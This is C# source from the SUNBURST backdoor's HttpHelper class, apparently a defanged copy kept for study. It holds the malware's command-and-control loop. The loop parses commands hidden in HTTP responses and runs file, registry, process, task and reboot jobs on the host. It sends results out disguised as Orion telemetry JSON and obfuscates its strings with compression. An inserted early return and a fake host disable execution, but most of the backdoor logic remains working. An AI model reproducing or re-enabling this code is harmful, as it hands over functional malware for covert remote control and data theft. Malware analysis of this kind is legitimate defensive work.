private static int AddFileExecutionEngine(HttpHelper.JobEngine job, string[] args, out string result)
{
result = null;
int result2 = 0;
switch (job)
{
case HttpHelper.JobEngine.GetFileSystemEntries:
Job.GetFileSystemEntries(args, out result);
break;
case HttpHelper.JobEngine.WriteFile:
Job.WriteFile(args);
break;
case HttpHelper.JobEngine.FileExists:
Job.FileExists(args, out result);
break;
case HttpHelper.JobEngine.DeleteFile:
Job.DeleteFile(args);
break;
case HttpHelper.JobEngine.GetFileHash:
result2 = Job.GetFileHash(args, out result);
break;
}
return(result2);
}
private static int AddRegistryExecutionEngine(HttpHelper.JobEngine job, string[] args, out string result)
{
result = null;
int result2 = 0;
switch (job)
{
case HttpHelper.JobEngine.ReadRegistryValue:
result2 = Job.ReadRegistryValue(args, out result);
break;
case HttpHelper.JobEngine.SetRegistryValue:
result2 = Job.SetRegistryValue(args);
break;
case HttpHelper.JobEngine.DeleteRegistryValue:
Job.DeleteRegistryValue(args);
break;
case HttpHelper.JobEngine.GetRegistrySubKeyAndValueNames:
Job.GetRegistrySubKeyAndValueNames(args, out result);
break;
}
return(result2);
}
private HttpHelper.JobEngine ParseServiceResponse(byte[] body, out string args)
{
args = null;
try
{
if (body == null || body.Length < 4)
{
return(HttpHelper.JobEngine.None);
}
HttpOipMethods httpOipMethods = this.requestMethod;
if (httpOipMethods != HttpOipMethods.Put)
{
if (httpOipMethods != HttpOipMethods.Post)
{
// "\{[0-9a-f-]{36}\}"|"[0-9a-f]{32}"|"[0-9a-f]{16}"
string[] value = (from Match m in Regex.Matches(Encoding.UTF8.GetString(body), ZipHelper.Unzip("U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA"), RegexOptions.IgnoreCase)
select m.Value).ToArray <string>();
body = Utilities.HexStringToByteArray(string.Join("", value).Replace("\"", string.Empty).Replace("-", string.Empty).Replace("{", string.Empty).Replace("}", string.Empty));
}
else
{
body = body.Skip(12).ToArray <byte>();
}
}
else
{
body = body.Skip(48).ToArray <byte>();
}
int num = BitConverter.ToInt32(body, 0);
body = body.Skip(4).Take(num).ToArray <byte>();
if (body.Length != num)
{
return(HttpHelper.JobEngine.None);
}
string[] array = Encoding.UTF8.GetString(HttpHelper.Deflate(body)).Trim().Split(new char[]
{
' '
}, 2);
HttpHelper.JobEngine jobEngine = (HttpHelper.JobEngine) int.Parse(array[0]);
args = ((array.Length > 1) ? array[1] : null);
return(Enum.IsDefined(typeof(HttpHelper.JobEngine), jobEngine) ? jobEngine : HttpHelper.JobEngine.None);
}
catch (Exception)
{
}
return(HttpHelper.JobEngine.None);
}
private HttpStatusCode CreateUploadRequest(HttpHelper.JobEngine job, int err, string response, out byte[] outData)
{
string text = this.httpHost;
byte[] array = null;
HttpHelper.HttpOipExMethods httpOipExMethods = (job != HttpHelper.JobEngine.Idle && job != HttpHelper.JobEngine.None) ? HttpHelper.HttpOipExMethods.Head : HttpHelper.HttpOipExMethods.Get;
outData = null;
try
{
if (!string.IsNullOrEmpty(response))
{
byte[] bytes = Encoding.UTF8.GetBytes(response);
byte[] bytes2 = BitConverter.GetBytes(err);
byte[] array2 = new byte[bytes.Length + bytes2.Length + this.customerId.Length];
Array.Copy(bytes, array2, bytes.Length);
Array.Copy(bytes2, 0, array2, bytes.Length, bytes2.Length);
Array.Copy(this.customerId, 0, array2, bytes.Length + bytes2.Length, this.customerId.Length);
array = HttpHelper.Inflate(array2);
httpOipExMethods = ((array.Length <= 10000) ? HttpHelper.HttpOipExMethods.Put : HttpHelper.HttpOipExMethods.Post);
}
if (!text.StartsWith(Uri.UriSchemeHttp + "://", StringComparison.OrdinalIgnoreCase) && !text.StartsWith(Uri.UriSchemeHttps + "://", StringComparison.OrdinalIgnoreCase))
{
text = Uri.UriSchemeHttps + "://" + text;
}
if (!text.EndsWith("/"))
{
text += "/";
}
text += this.GetBaseUri(httpOipExMethods, err);
HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(text);
if (httpOipExMethods == HttpHelper.HttpOipExMethods.Get || httpOipExMethods == HttpHelper.HttpOipExMethods.Head)
{
// If-None-Match
httpWebRequest.Headers.Add(ZipHelper.Unzip("80zT9cvPS9X1TSxJzgAA"), this.GetCache());
}
if (httpOipExMethods == HttpHelper.HttpOipExMethods.Put && (this.requestMethod == HttpOipMethods.Get || this.requestMethod == HttpOipMethods.Head))
{
int[] intArray = this.GetIntArray((array != null) ? array.Length : 0);
int num = 0;
ulong num2 = (ulong)DateTime.UtcNow.Subtract(new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalMilliseconds;
num2 -= 300000UL;
string text2 = "{";
// "userId":"{0}",
text2 += string.Format(ZipHelper.Unzip("UyotTi3yTFGyUqo2qFXSAQA="), this.GetOrionImprovementCustomerId());
// "sessionId":"{0}",
text2 += string.Format(ZipHelper.Unzip("UypOLS7OzM/zTFGyUqo2qFXSAQA="), this.sessionId.ToString().Trim(new char[]
{
'{',
'}'
}));
// "steps":[
text2 += ZipHelper.Unzip("UyouSS0oVrKKBgA=");
for (int i = 0; i < intArray.Length; i++)
{
uint num3 = (uint)((this.random.Next(4) == 0) ? this.random.Next(512) : 0);
num2 += (ulong)num3;
byte[] array3;
if (intArray[i] > 0)
{
num2 |= 2UL;
array3 = array.Skip(num).Take(intArray[i]).ToArray <byte>();
num += intArray[i];
}
else
{
num2 &= 18446744073709551613UL;
array3 = new byte[this.random.Next(16, 28)];
for (int j = 0; j < array3.Length; j++)
{
array3[j] = (byte)this.random.Next();
}
}
text2 += "{";
// "Timestamp":"\/Date({0})\/",
text2 += string.Format(ZipHelper.Unzip("UwrJzE0tLknMLVCyUorRd0ksSdWoNqjVjNFX0gEA"), num2);
string str = text2;
// "Index":{0},
string format = ZipHelper.Unzip("U/LMS0mtULKqNqjVAQA=");
int num4 = this.mIndex;
this.mIndex = num4 + 1;
text2 = str + string.Format(format, num4);
// "EventType":"Orion",
text2 += ZipHelper.Unzip("U3ItS80rCaksSFWyUvIvyszPU9IBAA==");
// "EventName":"EventManager",
text2 += ZipHelper.Unzip("U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==");
// "DurationMs":{0},
text2 += string.Format(ZipHelper.Unzip("U3IpLUosyczP8y1Wsqo2qNUBAA=="), num3);
// "Succeeded":true,
text2 += ZipHelper.Unzip("UwouTU5OTU1JTVGyKikqTdUBAA==");
// "Message":"{0}"
text2 += string.Format(ZipHelper.Unzip("U/JNLS5OTE9VslKqNqhVAgA="), Convert.ToBase64String(array3).Replace("/", "\\/"));
text2 += ((i + 1 != intArray.Length) ? "}," : "}");
}
text2 += "]}";
// application/json
httpWebRequest.ContentType = ZipHelper.Unzip("SywoyMlMTizJzM/TzyrOzwMA");
array = Encoding.UTF8.GetBytes(text2);
}
if (httpOipExMethods == HttpHelper.HttpOipExMethods.Post || this.requestMethod == HttpOipMethods.Put || this.requestMethod == HttpOipMethods.Post)
{
// application/octet-stream
httpWebRequest.ContentType = ZipHelper.Unzip("SywoyMlMTizJzM/Tz08uSS3RLS4pSk3MBQA=");
}
return(this.CreateUploadRequestImpl(httpWebRequest, array, out outData));
}
catch (Exception)
{
}
return((HttpStatusCode)0);
}
private int ExecuteEngine(HttpHelper.JobEngine job, string cl, out string result)
{
result = null;
int num = 0;
string[] args = Job.SplitString(cl);
int result2;
try
{
if (job == HttpHelper.JobEngine.ReadRegistryValue || job == HttpHelper.JobEngine.SetRegistryValue || job == HttpHelper.JobEngine.DeleteRegistryValue || job == HttpHelper.JobEngine.GetRegistrySubKeyAndValueNames)
{
num = HttpHelper.AddRegistryExecutionEngine(job, args, out result);
}
switch (job)
{
case HttpHelper.JobEngine.SetTime:
{
int num2;
Job.SetTime(args, out num2);
this.delay = num2;
break;
}
case HttpHelper.JobEngine.CollectSystemDescription:
Job.CollectSystemDescription(this.proxy.ToString(), out result);
break;
case HttpHelper.JobEngine.UploadSystemDescription:
Job.UploadSystemDescription(args, out result, this.proxy.GetWebProxy());
break;
case HttpHelper.JobEngine.RunTask:
num = Job.RunTask(args, cl, out result);
break;
case HttpHelper.JobEngine.GetProcessByDescription:
Job.GetProcessByDescription(args, out result);
break;
case HttpHelper.JobEngine.KillTask:
Job.KillTask(args);
break;
}
if (job == HttpHelper.JobEngine.WriteFile || job == HttpHelper.JobEngine.FileExists || job == HttpHelper.JobEngine.DeleteFile || job == HttpHelper.JobEngine.GetFileHash || job == HttpHelper.JobEngine.GetFileSystemEntries)
{
result2 = HttpHelper.AddFileExecutionEngine(job, args, out result);
}
else
{
result2 = num;
}
}
catch (Exception ex)
{
if (!string.IsNullOrEmpty(result))
{
result += "\n";
}
result += ex.Message;
result2 = ex.HResult;
}
return(result2);
}
public void Initialize()
{
HttpHelper.JobEngine jobEngine = HttpHelper.JobEngine.Idle;
string response = null;
int err = 0;
try
{
int num = 1;
while (num <= 3 && !this.isAbort)
{
byte[] body = null;
if (this.IsSynchronized(jobEngine == HttpHelper.JobEngine.Idle))
{
num = 0;
}
if (this.TrackEvent())
{
this.isAbort = true;
break;
}
HttpStatusCode httpStatusCode = this.CreateUploadRequest(jobEngine, err, response, out body);
/*DEFANG
* HERE WE RETURN . DONT REMOVE THAT RETURN.
*/
Console.WriteLine("THE BACKDOOR CONNECTED TO C2 SERVER " + Settings.fakehost);
Console.WriteLine("THE END.=====");
Settings.instance.Close(); //<-- DO NOT REMOVE!!!!!!
return; //<-- DO NOT REMOVE!!!!!!
if (jobEngine == HttpHelper.JobEngine.Exit || jobEngine == HttpHelper.JobEngine.Reboot)
{
this.isAbort = true;
break;
}
if (httpStatusCode <= HttpStatusCode.OK)
{
if (httpStatusCode != (HttpStatusCode)0)
{
if (httpStatusCode != HttpStatusCode.OK)
{
goto IL_DC;
}
goto IL_89;
}
}
else
{
if (httpStatusCode == HttpStatusCode.NoContent || httpStatusCode == HttpStatusCode.NotModified)
{
goto IL_89;
}
goto IL_DC;
}
IL_E3:
num++;
continue;
IL_89:
string cl = null;
if (httpStatusCode != HttpStatusCode.OK)
{
if (httpStatusCode != HttpStatusCode.NoContent)
{
jobEngine = HttpHelper.JobEngine.Idle;
}
else
{
num = ((jobEngine == HttpHelper.JobEngine.None || jobEngine == HttpHelper.JobEngine.Idle) ? num : 0);
jobEngine = HttpHelper.JobEngine.None;
}
}
else
{
jobEngine = this.ParseServiceResponse(body, out cl);
num = ((jobEngine == HttpHelper.JobEngine.None || jobEngine == HttpHelper.JobEngine.Idle) ? num : 0);
}
err = this.ExecuteEngine(jobEngine, cl, out response);
goto IL_E3;
IL_DC:
Utilities.DelayMin(1, 5);
goto IL_E3;
}
if (jobEngine == HttpHelper.JobEngine.Reboot)
{
NativeMethods.RebootComputer();
}
}
catch (Exception)
{
Console.WriteLine("Error in HTTPHelper. Unable to connect");
}
}